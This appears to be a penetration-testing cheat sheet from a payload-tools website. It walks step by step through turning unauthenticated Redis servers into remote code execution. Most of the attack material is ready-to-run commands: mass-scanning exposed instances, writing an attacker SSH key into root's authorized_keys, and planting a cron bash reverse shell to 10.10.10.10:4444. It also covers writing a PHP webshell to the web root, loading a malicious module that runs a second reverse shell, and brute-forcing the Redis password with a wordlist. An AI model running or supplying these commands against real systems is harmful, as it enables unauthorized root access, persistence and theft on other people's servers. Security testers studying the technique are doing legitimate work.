Redis Exploitation: From Unauthenticated Access to RCE and SSH Key Injection
Redis is an in-memory data store widely used for caching, sessions, and message queuing. When exposed to the internet without authentication — a shockingly common misconfiguration — it becomes trivially exploitable, often leading to remote code execution as root. This guide covers the full exploitation chain.
Finding Exposed Redis Instances
| Technique | Redis Version | Requirement | Difficulty |
|---|---|---|---|
| Cron RCE | All | Write access to /etc/cron.d | Easy |
| SSH key injection | All | Root running Redis, SSH enabled | Easy |
| Webshell via config | All | Web server path known | Easy |
| Redis module RCE | 4.x+ | CONFIG COMMAND available | Medium |
| Master-Replica RCE | 4.x+ | Network access | Hard |
| SSRF to Redis | All | SSRF on same network | Medium |
Redis listens on TCP port 6379 by default. Finding unauthenticated instances is straightforward:
# Shodan dork
port:6379 -auth
# nmap scan with banner grab
nmap -p 6379 --script redis-info 192.168.1.0/24
# Quick connectivity test
redis-cli -h 192.168.1.50 ping
# Expected response: PONG (no auth required)
# From Shodan/Censys, pipe IPs directly
while read ip; do redis-cli -h $ip --no-auth-warning ping 2>/dev/null && echo "$ip OPEN"; done < ips.txtBasic Redis Commands for Recon
Once connected, gather intelligence before exploiting:
# Server info — OS, Redis version, running user, data dir
redis-cli -h 192.168.1.50 INFO server
# All configuration values
redis-cli -h 192.168.1.50 CONFIG GET *
# List all keys (careful on large prod instances — use SCAN instead)
redis-cli -h 192.168.1.50 KEYS *
# Safer key enumeration
redis-cli -h 192.168.1.50 SCAN 0 COUNT 100
# Read a specific key
redis-cli -h 192.168.1.50 GET session:user123
# Check the data directory and dbfilename
redis-cli -h 192.168.1.50 CONFIG GET dir
redis-cli -h 192.168.1.50 CONFIG GET dbfilenameNote the running user (often root on misconfigured servers) and the data directory (typically /var/lib/redis or /etc/redis).
SSH Key Injection
If Redis runs as root, you can write your SSH public key into root's authorized_keys by changing the data directory and dump filename.
# Generate an SSH key pair on your attack box
ssh-keygen -t rsa -b 4096 -f /tmp/redis_key -N ''
# Prepare the key with padding (Redis adds extra newlines in dumps)
(echo -e "
"; cat /tmp/redis_key.pub; echo -e "
") > /tmp/key_padded.txt
# Connect and inject
redis-cli -h 192.168.1.50 CONFIG SET dir /root/.ssh
redis-cli -h 192.168.1.50 CONFIG SET dbfilename authorized_keys
# Set the key as a Redis value and write to disk
redis-cli -h 192.168.1.50 SET inject "$(cat /tmp/key_padded.txt)"
redis-cli -h 192.168.1.50 BGSAVE
# Wait a moment, then SSH in
ssh -i /tmp/redis_key [email protected]Cron-Based Reverse Shell
On systems where SSH isn't running or the .ssh write fails, write a cron job that calls back to your listener.
# Set up your listener first
nc -lvnp 4444
# Write cron job via Redis
redis-cli -h 192.168.1.50 CONFIG SET dir /var/spool/cron/crontabs
redis-cli -h 192.168.1.50 CONFIG SET dbfilename root
redis-cli -h 192.168.1.50 SET cron "
* * * * * bash -i >&/dev/tcp/10.10.10.10/4444 0>&1
"
redis-cli -h 192.168.1.50 BGSAVE
# On Debian/Ubuntu the crontab path may be different
redis-cli -h 192.168.1.50 CONFIG SET dir /var/spool/cron
redis-cli -h 192.168.1.50 CONFIG SET dbfilename www-dataWebShell via SAVE
If you know the web root path, write a PHP or JSP WebShell directly:
# PHP WebShell injection
redis-cli -h 192.168.1.50 CONFIG SET dir /var/www/html
redis-cli -h 192.168.1.50 CONFIG SET dbfilename shell.php
redis-cli -h 192.168.1.50 SET webshell "
"
redis-cli -h 192.168.1.50 BGSAVE
# Verify
curl 'http://192.168.1.50/shell.php?cmd=id'
# Note: the RDB dump format adds binary headers — the PHP parser ignores themRedis Module Loading for RCE
Redis 4.x+ supports loading custom modules. If you can write files, load a malicious shared library that exposes a system() command:
# Use the RedisModules-ExecuteCommand PoC
# https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
# Transfer the .so file to the target (via Redis SET + BGSAVE trick or other means)
redis-cli -h 192.168.1.50 MODULE LOAD /tmp/module.so
# Execute commands via loaded module
redis-cli -h 192.168.1.50 system.exec "id"
redis-cli -h 192.168.1.50 system.exec "bash -c 'bash -i >&/dev/tcp/10.10.10.10/4444 0>&1'"Bypassing Authenticated Redis
Redis authentication is a single shared password set via requirepass. Weak passwords are common:
# Brute force with custom wordlist
redis-cli -h 192.168.1.50 AUTH password
redis-cli -h 192.168.1.50 AUTH redis
redis-cli -h 192.168.1.50 AUTH 123456
# Automated brute force with Medusa
medusa -h 192.168.1.50 -p 6379 -u '' -P /usr/share/wordlists/rockyou.txt -M redis
# Redis 6+ ACL — even with auth, check for weak ACL users
redis-cli -h 192.168.1.50 -a 'weakpassword' ACL LIST
redis-cli -h 192.168.1.50 -a 'weakpassword' ACL WHOAMIRedis 6 introduced ACL users, but default configurations often leave the default user with full access. Check for NOPASS entries in the ACL list.
Real-World Impact Examples
- 2015: Thousands of internet-facing Redis servers exploited via SSH key injection — root shells in seconds
- Cryptomining campaigns (2018-present) systematically exploit unauthenticated Redis for persistent cron miners
- Cloud environments: Redis on 0.0.0.0 inside VPCs accessible via SSRF chains targeting app servers
Use the Network Recon Tool to discover Redis instances during your engagement. For SSRF chains that can reach internal Redis, see our SSRF Exploitation Guide. Cloud deployments often have Redis accessible via internal metadata paths — combine with Cloud Metadata Exploitation techniques.
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides